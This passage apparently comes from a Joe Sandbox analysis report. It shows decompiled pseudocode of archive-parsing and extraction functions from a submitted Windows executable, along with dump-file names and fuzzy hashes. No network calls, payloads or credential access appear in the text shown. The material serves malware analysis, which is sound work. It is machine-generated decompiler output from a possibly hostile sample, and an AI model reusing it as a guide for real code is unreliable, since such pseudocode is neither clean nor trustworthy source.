                              							 *(_t322 - 0x38) = 0;
                              							 *((short*)(_t322 - 0x36)) = 0;
                              							_t319 =  *( *((intOrPtr*)( *((intOrPtr*)(_t322 - 0x20)) + 0xc)) + _t266 * 4 - 4);
                              							_t187 =  *_t319;
                              							 *(_t322 - 4) = _t307;
                              							_t188 =  *((intOrPtr*)( *_t187 + 0x20))(_t187, _t307, _t322 - 0x38);
                              							if(_t188 != 0) {
                              								L35:
                              								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              								_t320 = _t188;
                              								E00405E34(_t322 - 0x38);
                              								L71:
                              								_t184 = _t320;
                              								goto L77;
                              							}
                              							if( *(_t322 - 0x38) != 0x13) {
                              								L75:
                              								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              								_t266 = _t322 - 0x38;
                              								E00405E34(_t266);
                              								goto L76;
                              							}
                              							_t191 =  *_t319;
                              							_t313 =  *(_t322 - 0x30);
                              							_t188 =  *((intOrPtr*)( *_t191 + 0x14))(_t191, _t322 - 0x3c);
                              							if(_t188 != 0) {
                              								goto L35;
                              							}
                              							if(_t313 >=  *((intOrPtr*)(_t322 - 0x3c))) {
                              								goto L75;
                              							}
                              							 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              							E00405E34(_t322 - 0x38);
                              							 *(_t322 - 0x10) = 0;
                              							_t193 =  *_t319;
                              							_t266 =  *_t193;
                              							 *(_t322 - 4) = 2;
                              							_t194 =  *_t266(_t193, 0x41b228, _t322 - 0x10);
                              							_t195 =  *(_t322 - 0x10);
                              							if(_t194 != 0 || _t195 == 0) {
                              								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              								goto L52;
                              							} else {
                              								 *(_t322 - 0x14) = 0;
                              								_t266 =  *_t195;
                              								 *(_t322 - 4) = 3;
                              								_t197 =  *((intOrPtr*)(_t266 + 0xc))(_t195, _t313, _t322 - 0x14);
                              								_t198 =  *(_t322 - 0x14);
                              								if(_t197 != 0 || _t198 == 0) {
                              									 *(_t322 - 4) = 2;
                              									goto L49;
                              								} else {
                              									 *(_t322 - 0x18) = 0;
                              									_t266 =  *_t198;
                              									 *(_t322 - 4) = 4;
                              									_t200 =  *_t266(_t198, 0x41b2f8, _t322 - 0x18);
                              									_t201 =  *(_t322 - 0x18);
                              									if(_t200 != 0 || _t201 == 0) {
                              										 *(_t322 - 4) = 3;
                              										goto L46;
                              									} else {
                              										E00408EA0(_t322 - 0x78);
                              										_push(_t322 - 0x74);
                              										_push(_t313);
                              										 *(_t322 - 4) = 5;
                              										_t205 = E0040836D(_t319);
                              										 *((intOrPtr*)(_t322 - 0x28)) = _t205;
                              										if(_t205 != 0) {
                              											 *(_t322 - 4) = 4;
                              											E004038C2(_t322 - 0x78);
                              											_t207 =  *(_t322 - 0x18);
                              											 *(_t322 - 4) = 3;
                              											if(_t207 != 0) {
                              												 *((intOrPtr*)( *_t207 + 8))(_t207);
                              											}
                              											_t208 =  *(_t322 - 0x14);
                              											 *(_t322 - 4) = 2;
                              											if(_t208 != 0) {
                              												 *((intOrPtr*)( *_t208 + 8))(_t208);
                              											}
                              											_t209 =  *(_t322 - 0x10);
                              											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              											if(_t209 != 0) {
                              												 *((intOrPtr*)( *_t209 + 8))(_t209);
                              											}
                              											_t184 =  *((intOrPtr*)(_t322 - 0x28));
                              											goto L77;
                              										}
                              										 *((intOrPtr*)(_t322 - 0x1c)) = 0;
                              										_t213 =  *((intOrPtr*)(_t322 + 0x1c));
                              										 *(_t322 - 4) = 6;
                              										 *((intOrPtr*)( *_t213))(_t213, 0x41b218, _t322 - 0x1c);
                              										_t215 =  *((intOrPtr*)(_t322 - 0x1c));
                              										if(_t215 != 0) {
                              											 *((intOrPtr*)( *_t215 + 0xc))(_t215,  *((intOrPtr*)(_t322 - 0x74)));
                              										}
                              										 *(_t322 - 0x58) = _t313;
                              										_t216 = E00408524(_t322 - 0x78,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *(_t322 - 0x18), 0,  *((intOrPtr*)(_t322 + 0x1c)));
                              										 *((intOrPtr*)(_t322 - 0x28)) = _t216;
                              										if(_t216 == 1) {
                              											_t217 =  *((intOrPtr*)(_t322 - 0x1c));
                              											 *(_t322 - 4) = 5;
                              											if(_t217 != 0) {
                              												 *((intOrPtr*)( *_t217 + 8))(_t217);
                              											}
                              											_t266 = _t322 - 0x78;
                              											 *(_t322 - 4) = 4;
                              											E004038C2(_t266);
                              											_t201 =  *(_t322 - 0x18);
                              											 *(_t322 - 4) = 3;
                              											L46:
                              											if(_t201 != 0) {
                              												_t266 =  *_t201;
                              												 *((intOrPtr*)(_t266 + 8))(_t201);
                              											}
                              											_t198 =  *(_t322 - 0x14);
                              											 *(_t322 - 4) = 2;
                              											L49:
                              											if(_t198 != 0) {
                              												_t266 =  *_t198;
                              												 *((intOrPtr*)(_t266 + 8))(_t198);
                              											}
                              											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              											_t195 =  *(_t322 - 0x10);
                              											L52:
                              											if(_t195 != 0) {
                              												_t266 =  *_t195;
                              												 *((intOrPtr*)(_t266 + 8))(_t195);
                              											}
                              											goto L76;
                              										} else {
                              											if(_t216 != 0) {
                              												_t220 =  *((intOrPtr*)(_t322 - 0x1c));
                              												 *(_t322 - 4) = 5;
                              												if(_t220 != 0) {
                              													 *((intOrPtr*)( *_t220 + 8))(_t220);
                              												}
                              												 *(_t322 - 4) = 4;
                              												E004038C2(_t322 - 0x78);
                              												_t222 =  *(_t322 - 0x18);
                              												 *(_t322 - 4) = 3;
                              												if(_t222 != 0) {
                              													 *((intOrPtr*)( *_t222 + 8))(_t222);
                              												}
                              												_t223 =  *(_t322 - 0x14);
                              												 *(_t322 - 4) = 2;
                              												if(_t223 != 0) {
                              													 *((intOrPtr*)( *_t223 + 8))(_t223);
                              												}
                              												_t224 =  *(_t322 - 0x10);
                              												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              												if(_t224 != 0) {
                              													 *((intOrPtr*)( *_t224 + 8))(_t224);
                              												}
                              												_t184 =  *((intOrPtr*)(_t322 - 0x28));
                              												goto L77;
                              											}
                              											_push(_t322 - 0x4c);
                              											_push(_t322 - 0x54);
                              											_push(_t313);
                              											_t320 = E0040848C(_t319);
                              											if(_t320 != 0) {
                              												_t232 =  *((intOrPtr*)(_t322 - 0x1c));
                              												 *(_t322 - 4) = 5;
                              												if(_t232 != 0) {
                              													 *((intOrPtr*)( *_t232 + 8))(_t232);
                              												}
                              												 *(_t322 - 4) = 4;
                              												E004038C2(_t322 - 0x78);
                              												_t234 =  *(_t322 - 0x18);
                              												 *(_t322 - 4) = 3;
                              												if(_t234 != 0) {
                              													 *((intOrPtr*)( *_t234 + 8))(_t234);
                              												}
                              												_t235 =  *(_t322 - 0x14);
                              												 *(_t322 - 4) = 2;
                              												if(_t235 != 0) {
                              													 *((intOrPtr*)( *_t235 + 8))(_t235);
                              												}
                              												_t236 =  *(_t322 - 0x10);
                              												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              												if(_t236 != 0) {
                              													 *((intOrPtr*)( *_t236 + 8))(_t236);
                              												}
                              												goto L71;
                              											}
                              											_push(_t322 - 0x78);
                              											E004093F0( *((intOrPtr*)(_t322 - 0x20)));
                              											_t243 =  *((intOrPtr*)(_t322 - 0x1c));
                              											 *(_t322 - 4) = 5;
                              											if(_t243 != 0) {
                              												 *((intOrPtr*)( *_t243 + 8))(_t243);
                              											}
                              											 *(_t322 - 4) = 4;
                              											E004038C2(_t322 - 0x78);
                              											_t245 =  *(_t322 - 0x18);
                              											 *(_t322 - 4) = 3;
                              											if(_t245 != 0) {
                              												 *((intOrPtr*)( *_t245 + 8))(_t245);
                              											}
                              											_t246 =  *(_t322 - 0x14);
                              											 *(_t322 - 4) = 2;
                              											if(_t246 != 0) {
                              												 *((intOrPtr*)( *_t246 + 8))(_t246);
                              											}
                              											_t247 =  *(_t322 - 0x10);
                              											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
                              											if(_t247 != 0) {
                              												 *((intOrPtr*)( *_t247 + 8))(_t247);
                              											}
                              											while(1) {
                              												_t317 =  *((intOrPtr*)(_t322 + 0xc));
                              												_t307 = 1;
                              												_t313 = _t313 | 0xffffffff;
                              												_t181 =  *((intOrPtr*)(_t317 + 8));
                              												 *(_t322 - 0x24) = _t313;
                              												if(_t181 < _t307) {
                              													goto L6;
                              												}
                              												goto L4;
                              											}
                              										}
                              									}
                              								}
                              							}
                              						}
                              						E00408EA0(_t322 - 0xb4);
                              						 *(_t322 - 4) = 0;
                              						E00401D7A(_t322 - 0xb0,  *((intOrPtr*)(_t322 + 0x18)));
                              						 *(_t322 - 0x94) = _t313;
                              						_t255 = E00408902(_t322 - 0xb4,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *((intOrPtr*)(_t322 + 0x10)),  *((intOrPtr*)(_t322 + 0x14)),  *((intOrPtr*)(_t322 + 0x1c))); // executed
                              						_t320 = _t255;
                              						if(_t320 != 0) {
                              							 *(_t322 - 4) = _t313;
                              							E004038C2(_t322 - 0xb4);
                              							goto L71;
                              						}
                              						_push(_t322 - 0xb4);
                              						E004093F0( *((intOrPtr*)(_t322 - 0x20)));
                              						 *(_t322 - 4) = _t313;
                              						E004038C2(_t322 - 0xb4);
                              						continue;
                              						L6:
                              						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
                              						if(_t266 >= 0x20) {
                              							goto L76;
                              						}
                              						goto L7;
                              					}
                              				} else {
                              					_t184 = 0x80004001;
                              					L77:
                              					 *[fs:0x0] =  *((intOrPtr*)(_t322 - 0xc));
                              					return _t184;
                              				}
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 463f0c4feddd306d7c1a8d70083033d754a2b3fae2b1194d3c8a033132b27601
                              • Instruction ID: 34c7193a5b50bb33ce0ba2a09d23f7b106f418ab12413814a78bbf0ce5505d58
                              • Opcode Fuzzy Hash: 463f0c4feddd306d7c1a8d70083033d754a2b3fae2b1194d3c8a033132b27601
                              • Instruction Fuzzy Hash: 62E17F70A00249DFCF10DFA4C988AAEBBB4AF58314F2445AEE495F72D1CB389E45CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 91%
                              			E0040EA0B(intOrPtr* __ecx, signed int __edx, void* __eflags) {
                              				intOrPtr _t191;
                              				intOrPtr* _t197;
                              				intOrPtr _t202;
                              				void* _t220;
                              				void* _t227;
                              				intOrPtr _t267;
                              				signed int _t271;
                              				intOrPtr* _t273;
                              				intOrPtr* _t277;
                              				intOrPtr* _t279;
                              				intOrPtr* _t283;
                              				void* _t284;
                              				void* _t289;
                              
                              				_t289 = __eflags;
                              				_t271 = __edx;
                              				E00413954(E0041A72D, _t284);
                              				_t273 = __ecx;
                              				E004032A8(_t284 - 0x5c, 8);
                              				 *((intOrPtr*)(_t284 - 0x5c)) = 0x41b694;
                              				 *(_t284 - 4) =  *(_t284 - 4) & 0x00000000;
                              				E004032A8(_t284 - 0xd8, 1);
                              				 *((intOrPtr*)(_t284 - 0xd8)) = 0x41b748;
                              				E004032A8(_t284 - 0xc4, 4);
                              				 *((intOrPtr*)(_t284 - 0xc4)) = 0x41b684;
                              				 *(_t284 - 4) = 2;
                              				E00402155(_t284 - 0x30);
                              				 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
                              				E004032A8(_t284 - 0x84, 4);
                              				 *((intOrPtr*)(_t284 - 0x84)) = 0x41b684;
                              				E004032A8(_t284 - 0x9c, 8);
                              				 *((intOrPtr*)(_t284 - 0x9c)) = 0x41b694;
                              				E004032A8(_t284 - 0xb0, 1);
                              				 *((intOrPtr*)(_t284 - 0xb0)) = 0x41b748;
                              				E004032A8(_t284 - 0x70, 4);
                              				 *((intOrPtr*)(_t284 - 0x70)) = 0x41b684;
                              				_t277 =  *((intOrPtr*)(_t284 + 0x10));
                              				 *(_t284 - 4) = 7;
                              				E0040E86B(__ecx, __edx, 0, _t277, _t284 - 0x5c, _t284 - 0xd8, _t284 - 0xc4, _t284 - 0x30, _t284 - 0x84, _t284 - 0x9c, _t284 - 0xb0, _t284 - 0x70);
                              				 *(_t284 - 0x14) =  *(_t284 - 0x14) & 0x00000000;
                              				E0040AC6A(_t284 - 0x164, _t289, 1);
                              				_t227 =  *_t277 +  *((intOrPtr*)(_t284 + 8));
                              				asm("adc esi, [ebp+0xc]");
                              				 *(_t284 + 0xc) =  *(_t284 + 0xc) & 0x00000000;
                              				 *((intOrPtr*)(_t284 - 0x34)) =  *((intOrPtr*)(_t277 + 4));
                              				if( *((intOrPtr*)(_t284 - 0x28)) <= 0) {
                              					L17:
                              					 *(_t284 - 4) = 7;
                              					E0040C380(_t284 - 0x164, _t301); // executed
                              					 *(_t284 - 4) = 6;
                              					E004042AD(_t284 - 0x70);
                              					 *(_t284 - 4) = 5;
                              					E004042AD(_t284 - 0xb0);
                              					 *(_t284 - 4) = 4;
                              					E004042AD(_t284 - 0x9c);
                              					 *(_t284 - 4) = 3;
                              					E004042AD(_t284 - 0x84);
                              					 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
                              					 *(_t284 - 4) = 0xc;
                              					_t279 = 0;
                              					L18:
                              					E004042D6();
                              					 *(_t284 - 4) = 2;
                              					E004042AD(_t284 - 0x30);
                              					 *(_t284 - 4) = 1;
                              					E004042AD(_t284 - 0xc4);
                              					 *(_t284 - 4) =  *(_t284 - 4) & 0x00000000;
                              					E004042AD(_t284 - 0xd8);
                              					 *(_t284 - 4) =  *(_t284 - 4) | 0xffffffff;
                              					E004042AD(_t284 - 0x5c);
                              					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0xc));
                              					return _t279;
                              				} else {
                              					goto L1;
                              				}
                              				while(1) {
                              					L1:
                              					 *(_t284 - 0x40) =  *(_t284 - 0x40) & 0x00000000;
                              					 *(_t284 - 0x3c) =  *(_t284 - 0x3c) & 0x00000000;
                              					 *((intOrPtr*)(_t284 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t284 - 0x24)) +  *(_t284 + 0xc) * 4));
                              					 *((intOrPtr*)(_t284 - 0x44)) = 0x41b818;
                              					_push(_t284 - 0x44);
                              					 *(_t284 - 4) = 9;
                              					E0040FA43( *((intOrPtr*)(_t284 + 0x14)));
                              					 *(_t284 - 4) = 8;
                              					 *((intOrPtr*)(_t284 - 0x44)) = 0x41b818;
                              					E00403A9C( *(_t284 - 0x3c));
                              					_t191 =  *((intOrPtr*)(_t284 + 0x14));
                              					_t282 =  *( *((intOrPtr*)(_t191 + 0xc)) +  *(_t191 + 8) * 4 - 4);
                              					 *(_t284 - 0x10) =  *( *((intOrPtr*)(_t191 + 0xc)) +  *(_t191 + 8) * 4 - 4);
                              					 *(_t284 - 0x1c) = E0040C281( *((intOrPtr*)(_t284 + 0x10)));
                              					_t256 =  *(_t284 - 0x1c);
                              					if( *(_t284 - 0x1c) !=  *(_t284 - 0x1c) || 0 != _t271) {
                              						E0040DB47(_t256);
                              					}
                              					E004076D5(_t282,  *(_t284 - 0x1c));
                              					_push(0x14);
                              					_t197 = E00403A76();
                              					_t283 = 0;
                              					if(_t197 != 0) {
                              						 *((intOrPtr*)(_t197 + 4)) = 0;
                              						 *_t197 = 0x41b824;
                              						_t283 = _t197;
                              					}
                              					_t294 = _t283;
                              					 *((intOrPtr*)(_t284 - 0x88)) = _t283;
                              					if(_t283 != 0) {
                              						 *((intOrPtr*)( *_t283 + 4))(_t283);
                              					}
                              					_t271 =  *(_t284 - 0x14);
                              					 *(_t283 + 0x10) =  *(_t283 + 0x10) & 0x00000000;
                              					 *((intOrPtr*)(_t283 + 8)) =  *((intOrPtr*)( *(_t284 - 0x10) + 8));
                              					 *(_t284 - 4) = 0xa;
                              					 *(_t283 + 0xc) =  *(_t284 - 0x1c);
                              					_t202 = E0040AD19(_t284 - 0x164, _t294,  *_t273, _t227,  *((intOrPtr*)(_t284 - 0x34)),  *(_t284 - 0x50) + _t271 * 8,  *((intOrPtr*)(_t284 + 0x10)), _t283, 0); // executed
                              					 *((intOrPtr*)(_t284 - 0x48)) = _t202;
                              					if(_t202 != 0) {
                              						break;
                              					}
                              					if( *((char*)( *((intOrPtr*)(_t284 + 0x10)) + 0x54)) != 0) {
                              						_t271 =  *(_t284 - 0x1c);
                              						_t220 = E004133B0( *((intOrPtr*)( *(_t284 - 0x10) + 8)), _t271);
                              						_t270 =  *((intOrPtr*)(_t284 + 0x10));
                              						if(_t220 !=  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x50))) {
                              							E0040DB47(_t270);
                              						}
                              					}
                              					 *(_t284 - 0x10) =  *(_t284 - 0x10) & 0x00000000;
                              					if( *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x30)) <= 0) {
                              						L14:
                              						 *(_t284 - 4) = 8;
                              						if(_t283 != 0) {
                              							 *((intOrPtr*)( *_t283 + 8))(_t283);
                              						}
                              						 *(_t284 + 0xc) =  *(_t284 + 0xc) + 1;
                              						_t301 =  *(_t284 + 0xc) -  *((intOrPtr*)(_t284 - 0x28));
                              						if( *(_t284 + 0xc) <  *((intOrPtr*)(_t284 - 0x28))) {
                              							continue;
                              						} else {
                              							goto L17;
                              						}
                              					} else {
                              						do {
                              							_t271 =  *(_t284 - 0x50);
                              							 *(_t284 - 0x14) =  *(_t284 - 0x14) + 1;
                              							_t267 =  *((intOrPtr*)(( *(_t284 - 0x14) << 3) + _t271));
                              							_t227 = _t227 + _t267;
                              							asm("adc [ebp-0x34], eax");
                              							 *((intOrPtr*)(_t273 + 0x48)) =  *((intOrPtr*)(_t273 + 0x48)) + _t267;
                              							asm("adc [edi+0x4c], eax");
                              							 *(_t284 - 0x10) =  *(_t284 - 0x10) + 1;
                              						} while ( *(_t284 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x30)));
                              						goto L14;
                              					}
                              				}
                              				__eflags = _t283;
                              				 *(_t284 - 4) = 8;
                              				if(__eflags != 0) {
                              					 *((intOrPtr*)( *_t283 + 8))(_t283);
                              				}
                              				 *(_t284 - 4) = 7;
                              				E0040C380(_t284 - 0x164, __eflags);
                              				 *(_t284 - 4) = 6;
                              				E004042AD(_t284 - 0x70);
                              				 *(_t284 - 4) = 5;
                              				E004042AD(_t284 - 0xb0);
                              				 *(_t284 - 4) = 4;
                              				E004042AD(_t284 - 0x9c);
                              				 *(_t284 - 4) = 3;
                              				E004042AD(_t284 - 0x84);
                              				 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
                              				_t279 =  *((intOrPtr*)(_t284 - 0x48));
                              				 *(_t284 - 4) = 0xb;
                              				goto L18;
                              			}
                              0x0040ed5e
                              0x0040ed62
                              0x0040ed6d
                              0x0040ed71
                              0x0040ed7c
                              0x0040ed80
                              0x0040ed85
                              0x0040ed8c
                              0x0040ed8f
                              0x00000000

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040EA10
                                • Part of subcall function 0040FA43: __EH_prolog.LIBCMT ref: 0040FA48
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 609558a53499a49e72743be03594cb330370f72dde39e5c62d9fac4dd36766c0
                              • Instruction ID: 11288496f406677f7bdfcb919023cacd5b8123072d96ac47e6bfd322b071945c
                              • Opcode Fuzzy Hash: 609558a53499a49e72743be03594cb330370f72dde39e5c62d9fac4dd36766c0
                              • Instruction Fuzzy Hash: 38C14770910269DFDB10DFA5C884BDDBBB4BF14308F1080AEE915B72C2CB786A49CB65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 95%
                              			E0040F648(intOrPtr* __ecx, void* __eflags) {
                              				char* _t92;
                              				signed char _t103;
                              				intOrPtr* _t104;
                              				signed char _t106;
                              				void* _t112;
                              				void* _t116;
                              				signed char _t120;
                              				void* _t124;
                              				signed int _t137;
                              				intOrPtr* _t144;
                              				void* _t145;
                              				void* _t164;
                              				signed char _t168;
                              				intOrPtr _t170;
                              				intOrPtr* _t173;
                              				signed char _t175;
                              				void* _t176;
                              
                              				E00413954(E0041A7FC, _t176);
                              				_t170 =  *((intOrPtr*)(_t176 + 8));
                              				_t173 = __ecx;
                              				E0040D377(_t170);
                              				 *((intOrPtr*)(_t170 + 0x138)) =  *((intOrPtr*)(_t173 + 0x20));
                              				 *((intOrPtr*)(_t170 + 0x13c)) =  *((intOrPtr*)(_t173 + 0x24));
                              				_t92 = _t170 + 0x130;
                              				 *_t92 =  *((intOrPtr*)(_t173 + 0x2e));
                              				_t143 =  *((intOrPtr*)(_t173 + 0x2f));
                              				 *((char*)(_t170 + 0x131)) =  *((intOrPtr*)(_t173 + 0x2f));
                              				if( *_t92 != 0) {
                              					E0040DB47(_t143);
                              				}
                              				_t144 = _t173 + 0x34;
                              				 *((intOrPtr*)(_t176 + 8)) =  *((intOrPtr*)(_t173 + 0x30));
                              				_t137 =  *(_t173 + 0x40);
                              				 *((intOrPtr*)(_t176 - 0x18)) =  *_t144;
                              				 *((intOrPtr*)(_t176 - 0x14)) =  *((intOrPtr*)(_t144 + 4));
                              				 *(_t176 - 0x20) =  *(_t173 + 0x3c);
                              				_t164 = 0x14;
                              				 *((intOrPtr*)(_t176 - 0x10)) =  *((intOrPtr*)(_t173 + 0x44));
                              				if(E004133B0(_t144, _t164) !=  *((intOrPtr*)(_t176 + 8))) {
                              					E0040DB47(_t144);
                              				}
                              				_t145 = 0;
                              				 *((intOrPtr*)(_t170 + 0x140)) =  *((intOrPtr*)(_t173 + 0x20)) + 0x20;
                              				asm("adc edx, ecx");
                              				 *((intOrPtr*)(_t170 + 0x144)) =  *((intOrPtr*)(_t173 + 0x24));
                              				if(( *(_t176 - 0x20) | _t137) != 0) {
                              					__eflags = _t137 - _t145;
                              					if(_t137 > _t145) {
                              						L11:
                              						_t103 = 1;
                              					} else {
                              						__eflags =  *(_t176 - 0x20) - 0xffffffff;
                              						if( *(_t176 - 0x20) > 0xffffffff) {
                              							goto L11;
                              						} else {
                              							__eflags =  *((intOrPtr*)(_t176 - 0x14)) - _t145;
                              							if(__eflags > 0) {
                              								L12:
                              								_t104 =  *_t173;
                              								_t103 =  *((intOrPtr*)( *_t104 + 0x10))(_t104,  *((intOrPtr*)(_t176 - 0x18)),  *((intOrPtr*)(_t176 - 0x14)), 1, _t145);
                              								__eflags = _t103;
                              								if(_t103 == 0) {
                              									 *((intOrPtr*)(_t176 - 0x30)) = 0;
                              									 *((intOrPtr*)(_t176 - 0x2c)) = 0;
                              									 *((intOrPtr*)(_t176 - 0x34)) = 0x41b818;
                              									 *(_t176 - 4) = 0;
                              									E004076D5(_t176 - 0x34,  *(_t176 - 0x20));
                              									_t106 = E0040776F(__eflags,  *(_t176 - 0x20));
                              									__eflags = _t106;
                              									if(_t106 == 0) {
                              										_t168 =  *(_t176 - 0x20);
                              										asm("adc ecx, 0x0");
                              										 *((intOrPtr*)(_t173 + 0x48)) =  *((intOrPtr*)(_t173 + 0x48)) + _t168 + 0x20;
                              										asm("adc [esi+0x4c], ecx");
                              										_t151 =  *((intOrPtr*)(_t176 - 0x2c));
                              										asm("adc ebx, [ebp-0x14]");
                              										 *((intOrPtr*)(_t170 + 0x1c8)) = _t168 +  *((intOrPtr*)(_t176 - 0x18)) + 0x20;
                              										asm("adc ebx, 0x0");
                              										 *(_t170 + 0x1cc) = _t137;
                              										_t112 = E004133B0( *((intOrPtr*)(_t176 - 0x2c)), _t168);
                              										__eflags = _t112 -  *((intOrPtr*)(_t176 - 0x10));
                              										if(_t112 !=  *((intOrPtr*)(_t176 - 0x10))) {
                              											E0040DB47(_t151);
                              										}
                              										 *(_t176 - 0x24) =  *(_t176 - 0x24) & 0x00000000;
                              										 *(_t176 - 4) = 1;
                              										E0040DAE2(_t173, _t176 - 0x34);
                              										E004032A8(_t176 - 0x48, 4);
                              										 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
                              										_t154 =  *((intOrPtr*)(_t173 + 0x18));
                              										 *(_t176 - 4) = 2;
                              										_t116 = E0040DBF4( *((intOrPtr*)(_t173 + 0x18)), _t168);
                              										__eflags = _t116 - 1;
                              										if(_t116 != 1) {
                              											L19:
                              											__eflags = _t116 - 0x17;
                              											if(_t116 != 0x17) {
                              												L21:
                              												E0040DB47(_t154);
                              											} else {
                              												__eflags = _t168;
                              												if(__eflags != 0) {
                              													goto L21;
                              												}
                              											}
                              											_t155 = _t173;
                              											_t120 = E0040EA0B(_t173, _t168, __eflags,  *((intOrPtr*)(_t170 + 0x140)),  *((intOrPtr*)(_t170 + 0x144)), _t170 + 0x150, _t176 - 0x48); // executed
                              											__eflags = _t120;
                              											if(_t120 == 0) {
                              												__eflags =  *(_t176 - 0x40);
                              												if( *(_t176 - 0x40) != 0) {
                              													__eflags =  *(_t176 - 0x40) - 1;
                              													if( *(_t176 - 0x40) > 1) {
                              														E0040DB47(_t155);
                              													}
                              													E0040DA34(_t176 - 0x28);
                              													E0040DAE2(_t173,  *((intOrPtr*)( *((intOrPtr*)(_t176 - 0x3c)))));
                              													_t158 =  *((intOrPtr*)(_t173 + 0x18));
                              													_t124 = E0040DBF4( *((intOrPtr*)(_t173 + 0x18)), _t168);
                              													__eflags = _t124 - 1;
                              													if(_t124 != 1) {
                              														L30:
                              														E0040DB47(_t158);
                              													} else {
                              														__eflags = _t168;
                              														if(_t168 != 0) {
                              															goto L30;
                              														}
                              													}
                              													goto L31;
                              												} else {
                              													 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
                              													 *(_t176 - 4) = 4;
                              													_t175 = 0;
                              												}
                              											} else {
                              												 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
                              												 *(_t176 - 4) = 3;
                              												goto L32;
                              											}
                              										} else {
                              											__eflags = _t168;
                              											if(_t168 == 0) {
                              												L31:
                              												 *((intOrPtr*)(_t170 + 0x1c0)) =  *((intOrPtr*)(_t173 + 0x48));
                              												 *((intOrPtr*)(_t170 + 0x1c4)) =  *((intOrPtr*)(_t173 + 0x4c));
                              												_t120 = E0040ED98(_t173, _t168, _t170);
                              												 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
                              												 *(_t176 - 4) = 5;
                              												L32:
                              												_t175 = _t120;
                              											} else {
                              												goto L19;
                              											}
                              										}
                              										E004042D6();
                              										 *(_t176 - 4) = 1;
                              										E004042AD(_t176 - 0x48);
                              										_t81 = _t176 - 4;
                              										 *_t81 =  *(_t176 - 4) & 0x00000000;
                              										__eflags =  *_t81;
                              										E0040DA34(_t176 - 0x28);
                              									} else {
                              										_t175 = _t106;
                              									}
                              									 *((intOrPtr*)(_t176 - 0x34)) = 0x41b818;
                              									E00403A9C( *((intOrPtr*)(_t176 - 0x2c)));
                              									_t103 = _t175;
                              								}
                              							} else {
                              								if(__eflags < 0) {
                              									goto L11;
                              								} else {
                              									__eflags =  *((intOrPtr*)(_t176 - 0x18)) - _t145;
                              									if( *((intOrPtr*)(_t176 - 0x18)) >= _t145) {
                              										goto L12;
                              									} else {
                              										goto L11;
                              									}
                              								}
                              							}
                              						}
                              					}
                              				} else {
                              					_t103 = 0;
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t176 - 0xc));
                              				return _t103;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
